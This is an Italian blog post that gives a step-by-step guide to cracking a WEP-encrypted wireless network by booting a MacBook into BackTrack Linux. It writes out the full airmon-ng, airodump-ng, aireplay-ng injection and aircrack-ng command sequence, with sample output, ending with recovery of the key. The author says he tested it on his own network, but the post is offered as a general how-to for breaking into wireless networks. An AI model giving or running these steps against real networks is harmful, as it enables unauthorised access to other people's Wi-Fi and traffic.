Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.
Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.
Difatti per abilitare tale funzione occorre solo il giusto programma:
Backtrack
una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.
La procedura è molto semplice:
Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .
Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).
Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.
Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.
Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:
Backtrack
Radio Network Analysis
80211
Cracking
Aircrack
Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:
Air Replay
Aiodump
Aircrack
La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.
Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.
Dalla Shell Airodump digitate:
iwconfig
e scoprite la sigla attribuita alla vostra scheda wifi:
lo no wileress extensions
eth0 no wileress extensions
wifi0 no wireless exensions
ath0 IEEE 802.11g ESSID:”” Nikname:””
Mode: Managed Channel:0 Access Point Not-Associated
Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1
Retry:off RTS thr:off Fragment thr:off
Encription key :off Power Management:off
digitate
airmon-ng start wifi0:
interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
che abilita ath1 (la mia scheda) in monitor mode
poi:
airodump-ng ath1
segnatevi il canale CH e fermate l’applicazione:
ctrl C
digitate:
airodump-ng -c 1 -w pippo ath1
Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap
Adesso per stimolare la produzione di IVs procedete con l’injection:
per testare se la scheda funziona:
aireplay-ng -9 ath1
se è tutto ok apparirà:
Trying broadcast probe requests….
Found 1 AP
poi procederò a pingare gli Access Point disponibili:
Trying directed probe requests
00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’
Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79
30/30: 100%
Injection is working!
aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1
ed ecco partire l’injection dalla nostra Airport.
Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.
Dalla Shell di Aircrack digitate
aircrack-ng -a 1 pippo-01.cap
se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.
Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.
Buon lavoro
Lascia un commento
Devi essere connesso per inviare un commento.